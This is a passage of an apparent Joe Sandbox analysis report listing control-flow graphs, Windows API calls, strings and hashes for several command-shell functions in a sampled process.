                                                                                                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 732 7ff7d1523c24-7ff7d1523c61 733 7ff7d152ec5a-7ff7d152ec5f 732->733 734 7ff7d1523c67-7ff7d1523c99 call 7ff7d151af14 call 7ff7d151ca40 732->734 733->734 736 7ff7d152ec65-7ff7d152ec6a 733->736 743 7ff7d152ec97-7ff7d152eca1 call 7ff7d152855c 734->743 744 7ff7d1523c9f-7ff7d1523cb2 call 7ff7d151b900 734->744 738 7ff7d152412e-7ff7d152415b call 7ff7d1528f80 736->738 744->743 749 7ff7d1523cb8-7ff7d1523cbc 744->749 750 7ff7d1523cbf-7ff7d1523cc7 749->750 750->750 751 7ff7d1523cc9-7ff7d1523ccd 750->751 752 7ff7d1523cd2-7ff7d1523cd8 751->752 753 7ff7d1523cda-7ff7d1523cdf 752->753 754 7ff7d1523ce5-7ff7d1523d62 GetCurrentDirectoryW towupper iswalpha 752->754 753->754 755 7ff7d1523faa-7ff7d1523fb3 753->755 756 7ff7d1523fb8 754->756 757 7ff7d1523d68-7ff7d1523d6c 754->757 755->752 759 7ff7d1523fc6-7ff7d1523fec GetLastError call 7ff7d152855c call 7ff7d152a5d6 756->759 757->756 758 7ff7d1523d72-7ff7d1523dcd towupper GetFullPathNameW 757->758 758->759 760 7ff7d1523dd3-7ff7d1523ddd 758->760 762 7ff7d1523ff1-7ff7d1524007 call 7ff7d152855c _local_unwind 759->762 760->762 763 7ff7d1523de3-7ff7d1523dfb 760->763 773 7ff7d152400c-7ff7d1524022 GetLastError 762->773 765 7ff7d15240fe-7ff7d1524119 call 7ff7d152855c _local_unwind 763->765 766 7ff7d1523e01-7ff7d1523e11 763->766 775 7ff7d152411a-7ff7d152412c call 7ff7d151ff70 call 7ff7d152855c 765->775 766->765 769 7ff7d1523e17-7ff7d1523e28 766->769 772 7ff7d1523e2c-7ff7d1523e34 769->772 772->772 776 7ff7d1523e36-7ff7d1523e3f 772->776 777 7ff7d1524028-7ff7d152402b 773->777 778 7ff7d1523e95-7ff7d1523e9c 773->778 775->738 780 7ff7d1523e42-7ff7d1523e55 776->780 777->778 781 7ff7d1524031-7ff7d1524047 call 7ff7d152855c _local_unwind 777->781 782 7ff7d1523e9e-7ff7d1523ec2 call 7ff7d1522978 778->782 783 7ff7d1523ecf-7ff7d1523ed3 778->783 787 7ff7d1523e57-7ff7d1523e60 780->787 788 7ff7d1523e66-7ff7d1523e8f GetFileAttributesW 780->788 799 7ff7d152404c-7ff7d1524062 call 7ff7d152855c _local_unwind 781->799 791 7ff7d1523ec7-7ff7d1523ec9 782->791 785 7ff7d1523f08-7ff7d1523f0b 783->785 786 7ff7d1523ed5-7ff7d1523ef7 GetFileAttributesW 783->786 795 7ff7d1523f1e-7ff7d1523f40 SetCurrentDirectoryW 785->795 796 7ff7d1523f0d-7ff7d1523f11 785->796 793 7ff7d1524067-7ff7d1524098 GetLastError call 7ff7d152855c _local_unwind 786->793 794 7ff7d1523efd-7ff7d1523f02 786->794 787->788 797 7ff7d1523f9d-7ff7d1523fa5 787->797 788->773 788->778 791->783 791->799 802 7ff7d152409d-7ff7d15240b3 call 7ff7d152855c _local_unwind 793->802 794->785 794->802 804 7ff7d1523f46-7ff7d1523f69 call 7ff7d152498c 795->804 805 7ff7d15240b8-7ff7d15240de GetLastError call 7ff7d152855c _local_unwind 795->805 803 7ff7d1523f13-7ff7d1523f1c 796->803 796->804 797->780 799->793 802->805 803->795 803->804 815 7ff7d15240e3-7ff7d15240f9 call 7ff7d152855c _local_unwind 804->815 816 7ff7d1523f6f-7ff7d1523f98 call 7ff7d152417c 804->816 805->815 815->765 816->775
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1809961153-336475711
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 734ef4eb37dd310d376e711d0a2030d3fc9247bb3473ba6da7b1b02340b469a4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25D11A23708B8A91FB60AB15E4442AEB7A1FB89740FC44176DA4F836B5DFBCE544C710
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1522394 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 213COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 914 7ff7d1522394-7ff7d1522416 memset call 7ff7d151ca40 917 7ff7d152241c-7ff7d1522453 GetModuleFileNameW call 7ff7d152081c 914->917 918 7ff7d152e0d2-7ff7d152e0da call 7ff7d1524c1c 914->918 923 7ff7d1522459-7ff7d1522468 call 7ff7d152081c 917->923 924 7ff7d152e0db-7ff7d152e0ee call 7ff7d152498c 917->924 918->924 929 7ff7d152246e-7ff7d152247d call 7ff7d152081c 923->929 930 7ff7d152e0f4-7ff7d152e107 call 7ff7d152498c 923->930 924->930 935 7ff7d1522483-7ff7d1522492 call 7ff7d152081c 929->935 936 7ff7d1522516-7ff7d1522529 call 7ff7d152498c 929->936 937 7ff7d152e10d-7ff7d152e123 930->937 935->937 947 7ff7d1522498-7ff7d15224a7 call 7ff7d152081c 935->947 936->935 940 7ff7d152e13f-7ff7d152e17a _wcsupr 937->940 941 7ff7d152e125-7ff7d152e139 wcschr 937->941 945 7ff7d152e17c-7ff7d152e17f 940->945 946 7ff7d152e181-7ff7d152e199 wcsrchr 940->946 941->940 944 7ff7d152e27c 941->944 949 7ff7d152e283-7ff7d152e29b call 7ff7d152498c 944->949 948 7ff7d152e19c 945->948 946->948 956 7ff7d15224ad-7ff7d15224c5 call 7ff7d1523c24 947->956 957 7ff7d152e2a1-7ff7d152e2c3 _wcsicmp 947->957 951 7ff7d152e1a0-7ff7d152e1a7 948->951 949->957 951->951 954 7ff7d152e1a9-7ff7d152e1bb 951->954 958 7ff7d152e1c1-7ff7d152e1e6 954->958 959 7ff7d152e264-7ff7d152e277 call 7ff7d1521300 954->959 961 7ff7d15224ca-7ff7d15224db 956->961 963 7ff7d152e21a 958->963 964 7ff7d152e1e8-7ff7d152e1f1 958->964 959->944 965 7ff7d15224e9-7ff7d1522514 call 7ff7d1528f80 961->965 966 7ff7d15224dd-7ff7d15224e4 ??_V@YAXPEAX@Z 961->966 967 7ff7d152e21d-7ff7d152e21f 963->967 968 7ff7d152e201-7ff7d152e210 964->968 969 7ff7d152e1f3-7ff7d152e1f6 964->969 966->965 967->949 972 7ff7d152e221-7ff7d152e228 967->972 968->963 970 7ff7d152e212-7ff7d152e218 968->970 969->968 973 7ff7d152e1f8-7ff7d152e1ff 969->973 970->967 975 7ff7d152e22a-7ff7d152e231 972->975 976 7ff7d152e254-7ff7d152e262 972->976 973->968 973->969 977 7ff7d152e234-7ff7d152e237 975->977 976->944 977->976 978 7ff7d152e239-7ff7d152e242 977->978 978->976 979 7ff7d152e244-7ff7d152e252 978->979 979->976 979->977
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2622545777-4197029667
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: bc67b4ac6c9ae8dc8aa03d7640ce546299fc8a55271f7ee994edb6499b34c01a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 990f5a80da7463dfb02d8ffe918508bb2ff50a7a53fd00350f8d5109df435baf
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc67b4ac6c9ae8dc8aa03d7640ce546299fc8a55271f7ee994edb6499b34c01a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03915862B49A8B85FF24AB10D8502FCA3A1FF49B84FD44176C90F876B5DEBCE5158360
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1520580 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ConsoleMode_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: CMD.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1606018815-3025314500
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 29b71c908c8d31d66ee902027ca77db465c7e9ac89c9aee9236c1acaf79c43e2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8541DC75A0961B8BF7546B15E8542BCBAB0BF89751FD49276D90F82370DFBCA4048620
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151C620 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 312COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 992 7ff7d151c620-7ff7d151c66f GetConsoleTitleW 993 7ff7d152c5f2 992->993 994 7ff7d151c675-7ff7d151c687 call 7ff7d151af14 992->994 996 7ff7d152c5fc-7ff7d152c60c GetLastError 993->996 999 7ff7d151c689 994->999 1000 7ff7d151c68e-7ff7d151c69d call 7ff7d151ca40 994->1000 998 7ff7d152c5e3 call 7ff7d1513278 996->998 1003 7ff7d152c5e8-7ff7d152c5ed call 7ff7d152855c 998->1003 999->1000 1000->1003 1005 7ff7d151c6a3-7ff7d151c6ac 1000->1005 1003->993 1007 7ff7d151c6b2-7ff7d151c6c5 call 7ff7d151b9c0 1005->1007 1008 7ff7d151c954-7ff7d151c95e call 7ff7d152291c 1005->1008 1015 7ff7d151c6cb-7ff7d151c6ce 1007->1015 1016 7ff7d151c9b5-7ff7d151c9b8 call 7ff7d1525c6c 1007->1016 1013 7ff7d152c5de-7ff7d152c5e0 1008->1013 1014 7ff7d151c964-7ff7d151c972 call 7ff7d15189c0 1008->1014 1013->998 1014->996 1024 7ff7d151c978-7ff7d151c99a towupper 1014->1024 1015->1003 1018 7ff7d151c6d4-7ff7d151c6e9 1015->1018 1023 7ff7d151c9bd-7ff7d151c9c9 call 7ff7d152855c 1016->1023 1021 7ff7d151c6ef-7ff7d151c6fa 1018->1021 1022 7ff7d152c616-7ff7d152c620 call 7ff7d152855c 1018->1022 1025 7ff7d152c627 1021->1025 1026 7ff7d151c700-7ff7d151c713 1021->1026 1022->1025 1039 7ff7d151c9d0-7ff7d151c9d7 1023->1039 1029 7ff7d151c9a0-7ff7d151c9a9 1024->1029 1031 7ff7d152c631 1025->1031 1030 7ff7d151c719-7ff7d151c72c 1026->1030 1026->1031 1029->1029 1034 7ff7d151c9ab-7ff7d151c9af 1029->1034 1035 7ff7d152c63b 1030->1035 1036 7ff7d151c732-7ff7d151c747 call 7ff7d151d3f0 1030->1036 1031->1035 1034->1016 1037 7ff7d152c60e-7ff7d152c611 call 7ff7d153ec14 1034->1037 1040 7ff7d152c645 1035->1040 1045 7ff7d151c8ac-7ff7d151c8af 1036->1045 1046 7ff7d151c74d-7ff7d151c750 1036->1046 1037->1022 1043 7ff7d151c9dd-7ff7d152c6da SetConsoleTitleW 1039->1043 1044 7ff7d151c872-7ff7d151c8aa call 7ff7d152855c call 7ff7d1528f80 1039->1044 1050 7ff7d152c64e-7ff7d152c651 1040->1050 1043->1044 1045->1046 1049 7ff7d151c8b5-7ff7d151c8d3 wcsncmp 1045->1049 1051 7ff7d151c76a-7ff7d151c76d 1046->1051 1052 7ff7d151c752-7ff7d151c764 call 7ff7d151bd38 1046->1052 1049->1051 1056 7ff7d151c8d9 1049->1056 1057 7ff7d152c657-7ff7d152c65b 1050->1057 1058 7ff7d151c80d-7ff7d151c811 1050->1058 1054 7ff7d151c840-7ff7d151c84b call 7ff7d151cb40 1051->1054 1055 7ff7d151c773-7ff7d151c77a 1051->1055 1052->1003 1052->1051 1077 7ff7d151c84d-7ff7d151c855 call 7ff7d151cad4 1054->1077 1078 7ff7d151c856-7ff7d151c86c 1054->1078 1062 7ff7d151c780-7ff7d151c784 1055->1062 1056->1046 1057->1058 1064 7ff7d151c817-7ff7d151c81b 1058->1064 1065 7ff7d151c9e2-7ff7d151c9e7 1058->1065 1068 7ff7d151c78a-7ff7d151c7a4 wcschr 1062->1068 1069 7ff7d151c83d 1062->1069 1071 7ff7d151ca1b-7ff7d151ca1f 1064->1071 1072 7ff7d151c821 1064->1072 1065->1064 1067 7ff7d151c9ed-7ff7d151c9f7 call 7ff7d152291c 1065->1067 1086 7ff7d151c9fd-7ff7d151ca00 1067->1086 1087 7ff7d152c684-7ff7d152c698 call 7ff7d1513278 1067->1087 1075 7ff7d151c7aa-7ff7d151c7ad 1068->1075 1076 7ff7d151c8de-7ff7d151c8f7 1068->1076 1069->1054 1071->1072 1079 7ff7d151ca25-7ff7d152c6b3 call 7ff7d1513278 1071->1079 1073 7ff7d151c824-7ff7d151c82d 1072->1073 1073->1073 1080 7ff7d151c82f-7ff7d151c837 1073->1080 1082 7ff7d151c7b0-7ff7d151c7b8 1075->1082 1083 7ff7d151c900-7ff7d151c908 1076->1083 1077->1078 1078->1039 1078->1044 1079->1003 1080->1062 1080->1069 1082->1082 1088 7ff7d151c7ba-7ff7d151c7c7 1082->1088 1083->1083 1089 7ff7d151c90a-7ff7d151c915 1083->1089 1086->1064 1093 7ff7d151ca06-7ff7d151ca10 call 7ff7d15189c0 1086->1093 1087->1003 1088->1050 1094 7ff7d151c7cd-7ff7d151c7db 1088->1094 1095 7ff7d151c917 1089->1095 1096 7ff7d151c93a-7ff7d151c944 1089->1096 1093->1064 1111 7ff7d151ca16-7ff7d152c67f GetLastError call 7ff7d1513278 1093->1111 1100 7ff7d151c7e0-7ff7d151c7e7 1094->1100 1101 7ff7d151c920-7ff7d151c928 1095->1101 1103 7ff7d151ca2a-7ff7d151ca2f call 7ff7d1529158 1096->1103 1104 7ff7d151c94a 1096->1104 1106 7ff7d151c7e9-7ff7d151c7f1 1100->1106 1107 7ff7d151c800-7ff7d151c803 1100->1107 1108 7ff7d151c92a-7ff7d151c92f 1101->1108 1109 7ff7d151c932-7ff7d151c938 1101->1109 1103->1013 1104->1008 1106->1107 1112 7ff7d151c7f3-7ff7d151c7fe 1106->1112 1107->1040 1113 7ff7d151c809 1107->1113 1108->1109 1109->1096 1109->1101 1111->1003 1112->1100 1112->1107 1113->1058
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ConsoleTitlewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: /$:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2364928044-4222935259
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 18b5fc1b2ec7561f4a1e071935b117a16da6c033c327c323cb9fcfc49729d23f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: e2ca0c16b49d53aeb54f77df9532cc4c6649e3e8c7334f42884c1fbeddce7399
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 18b5fc1b2ec7561f4a1e071935b117a16da6c033c327c323cb9fcfc49729d23f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9CC18C62A1864B81FB65BB15A4542BDB2A1AF41B90FC64132D91F472F5DFBDE884C330
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1528D80 Relevance: 9.1, APIs: 6, Instructions: 95sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 1171 7ff7d1528d80-7ff7d1528da2 1172 7ff7d1528da4-7ff7d1528daf 1171->1172 1173 7ff7d1528dcc 1172->1173 1174 7ff7d1528db1-7ff7d1528db4 1172->1174 1177 7ff7d1528dd1-7ff7d1528dd9 1173->1177 1175 7ff7d1528dbf-7ff7d1528dca Sleep 1174->1175 1176 7ff7d1528db6-7ff7d1528dbd 1174->1176 1175->1172 1176->1177 1178 7ff7d1528de7-7ff7d1528def 1177->1178 1179 7ff7d1528ddb-7ff7d1528de5 _amsg_exit 1177->1179 1181 7ff7d1528df1-7ff7d1528e0a 1178->1181 1182 7ff7d1528e46 1178->1182 1180 7ff7d1528e4c-7ff7d1528e54 1179->1180 1183 7ff7d1528e56-7ff7d1528e69 _initterm 1180->1183 1184 7ff7d1528e73-7ff7d1528e75 1180->1184 1185 7ff7d1528e0e-7ff7d1528e11 1181->1185 1182->1180 1183->1184 1188 7ff7d1528e77-7ff7d1528e79 1184->1188 1189 7ff7d1528e80-7ff7d1528e88 1184->1189 1186 7ff7d1528e38-7ff7d1528e3a 1185->1186 1187 7ff7d1528e13-7ff7d1528e15 1185->1187 1186->1180 1191 7ff7d1528e3c-7ff7d1528e41 1186->1191 1190 7ff7d1528e17-7ff7d1528e1b 1187->1190 1187->1191 1188->1189 1192 7ff7d1528e8a-7ff7d1528e98 call 7ff7d15294f0 1189->1192 1193 7ff7d1528eb4-7ff7d1528ec8 call 7ff7d15237d8 1189->1193 1194 7ff7d1528e2d-7ff7d1528e36 1190->1194 1195 7ff7d1528e1d-7ff7d1528e27 call 7ff7d15293b0 1190->1195 1197 7ff7d1528f28-7ff7d1528f3d 1191->1197 1192->1193 1201 7ff7d1528e9a-7ff7d1528eaa 1192->1201 1200 7ff7d1528ecd-7ff7d1528eda 1193->1200 1194->1185 1202 7ff7d1528e29 1195->1202 1203 7ff7d1528edc-7ff7d1528ede exit 1200->1203 1204 7ff7d1528ee4-7ff7d1528eeb 1200->1204 1201->1193 1202->1194 1203->1204 1205 7ff7d1528ef9 1204->1205 1206 7ff7d1528eed-7ff7d1528ef3 _cexit 1204->1206 1205->1197 1206->1205
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 4291973834-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d5c798492a9ea8eadece112d5374d136a8042fe81ae4d24956d32f1238edd288
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0541C922A0861F86F750BB50E94027DA2E0AF54754FE444B7EA1F876B4DFFCE8448760
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1524A14 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 1208 7ff7d1524a14-7ff7d1524a3e GetEnvironmentStringsW 1209 7ff7d1524aae-7ff7d1524ac5 1208->1209 1210 7ff7d1524a40-7ff7d1524a46 1208->1210 1211 7ff7d1524a48-7ff7d1524a52 1210->1211 1212 7ff7d1524a59-7ff7d1524a8f GetProcessHeap HeapAlloc 1210->1212 1211->1211 1213 7ff7d1524a54-7ff7d1524a57 1211->1213 1214 7ff7d1524a9f-7ff7d1524aa9 FreeEnvironmentStringsW 1212->1214 1215 7ff7d1524a91-7ff7d1524a9a memmove 1212->1215 1213->1211 1213->1212 1214->1209 1215->1214
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
